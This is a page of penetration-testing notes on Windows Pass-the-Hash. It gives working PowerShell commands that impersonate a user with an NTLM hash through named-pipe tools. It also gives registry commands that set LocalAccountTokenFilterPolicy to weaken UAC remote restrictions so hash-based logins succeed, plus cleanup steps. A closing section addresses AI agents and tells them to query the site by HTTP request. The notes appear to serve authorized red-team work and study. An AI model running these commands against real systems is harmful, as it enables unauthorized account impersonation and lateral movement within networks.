# Pass-the-Hash * ## NamedPipePTH * * * Impersonate a user with Pass-the-Hash for **local** actions (network authentication does not work with `Impersonation Token`, only with `Delegation Token`): ``` PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe" ``` Can be used for authenticating in SQL Server management tools (`%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe`) and accessing DBs with SQL admin hash, for example. ## PtH Notes * * ### User Account Control * ### LocalAccountTokenFilterPolicy & FilterAdministratorToken | Property Name | Property Path | | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------- | | [LocalAccountTokenFilterPolicy](https://docs.microsoft.com/ru-ru/troubleshoot/windows-server/windows-security/user-account-control-and-remote-restriction) | `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\` | | [FilterAdministratorToken](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/7c705718-f58e-4886-8057-37c8fd9aede1) | `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\` | If `LocalAccountTokenFilterPolicy` exists and is set to `1` (doesn't exist by default), remote connections from **all** local admins are not affected by UAC and PtH will succeed: ``` PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy ``` If `FilterAdministratorToken` exists and is set to `1` (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail: ``` PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name FilterAdministratorToken ``` Add: ``` Cmd > reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f PS > New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -PropertyType "DWORD" -Value 1 -Force ``` Cleanup: ``` Cmd > reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /f PS > Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Force ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/lateral-movement/pth.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.